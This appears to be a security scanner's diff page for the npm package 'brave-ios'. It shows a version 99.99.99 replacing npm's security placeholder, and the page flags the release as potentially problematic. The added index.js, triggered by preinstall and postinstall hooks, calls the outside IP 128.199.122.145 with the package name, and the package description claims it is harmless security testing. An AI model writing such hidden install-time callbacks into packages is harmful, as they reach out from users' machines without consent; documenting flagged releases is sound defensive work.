brave-ios 0.0.1-security → 99.99.99

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of brave-ios might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +6 -0
  2. package/package.json +16 -4
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1,6 @@
1
+ const request = require("requests")
2
+
3
+ let host = "128.199.122.145"
4
+ let packages = "brave-ios"
5
+
6
+ request(`http://${host}/?${packages}`, (error, response, body) => {})
package/package.json CHANGED
@@ -1,6 +1,18 @@
1
1
  {
2
+ "Dependencies": {
3
+ "request": "^2.88.2"
4
+ },
5
+ "dependencies": {
6
+ "requests": "^0.3.0"
7
+ },
8
+ "description": "This package is intended for security testing and does not contain any malicious code.",
9
+ "license": "ISC",
10
+ "main": "index.js",
2
11
  "name": "brave-ios",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
6
- }
12
+ "scripts": {
13
+ "postinstall": "node index.js --save-prod",
14
+ "preinstall": "node index.js --save-prod",
15
+ "start": "node index.js --save-prod"
16
+ },
17
+ "version": "99.99.99"
18
+ }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=brave-ios for more information.